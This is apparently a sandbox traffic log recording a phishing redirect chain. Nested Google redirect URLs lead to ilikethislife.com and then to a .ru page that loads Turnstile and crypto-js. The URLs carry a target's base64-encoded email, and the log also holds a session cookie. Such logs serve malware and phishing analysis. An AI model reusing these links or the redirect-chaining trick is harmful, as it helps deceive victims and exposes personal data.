Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm&safe=active HTTP/1.1Host: google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm&safe=active HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /url?q=https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
Source: global trafficHTTP traffic detected: GET /url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
Source: global trafficHTTP traffic detected: GET /url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
Source: global trafficHTTP traffic detected: GET ////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
Source: global trafficHTTP traffic detected: GET /winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ== HTTP/1.1Host: ilikethislife.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /16E/ HTTP/1.1Host: rfll.yordickyel.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ilikethislife.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ilikethislife.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfll.yordickyel.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
